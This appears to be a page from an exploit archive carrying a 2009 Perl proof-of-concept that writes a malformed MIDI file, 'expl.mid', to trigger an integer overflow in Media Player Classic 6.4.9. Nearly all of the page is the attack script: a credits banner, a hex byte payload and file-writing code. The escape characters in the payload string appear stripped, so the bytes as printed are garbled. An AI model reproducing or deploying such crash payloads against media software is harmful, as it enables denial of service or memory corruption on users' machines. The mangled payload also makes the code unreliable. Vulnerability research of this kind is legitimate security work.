[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Media Player Classic 6.4.9 (.mid) Integer Overflow PoC
# Published : 2009-09-09
# Author : Platen
# Previous Title : Dnsmasq < 2.50 Heap Overflow & Null pointer Dereference Vulns
# Next Title : Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service
#! /usr/bin/perl
print qq(
############################################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## Media Player Classic 6.4.9(.mid) Integer Overflow PoC ##
## Vulnerability Discovered By : PLATEN ##
## E-mail && blog: ##
## hjafari.blogspot.com ##
## platen.secure[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
## and all members in Pentesters.ir ##
############################################################
);
$boom = "x4dx54x68x64x00x00x00x06x00x01x00x01x00x60x4dx54".
"x72x6bx00x00x00x4ex00xffx03x08x34x31x33x61x34x61".
"x35x30x00x91x41x60x01x3ax60x01x4ax60x01x50x60x7d".
"x81x41x01x01x3ax5fx8dxe4xa0x01x50x01x3dx91x41x60".
"x81x00x81x41x40x00x91x3ax60x81x00x76x6fxccx3dxa6".
"xc2x48xeex8excaxc2x57x00x91x50x60x81x00x81x50x40".
"x00xffx2fx00";
open(fhandle,'>>expl.mid') || die "can't create file: expl.mid";
print fhandle $boom;
close(fhandle);
print "n [+] File created successfully: expl.mid n";
# www.Syue.com [2009-09-09]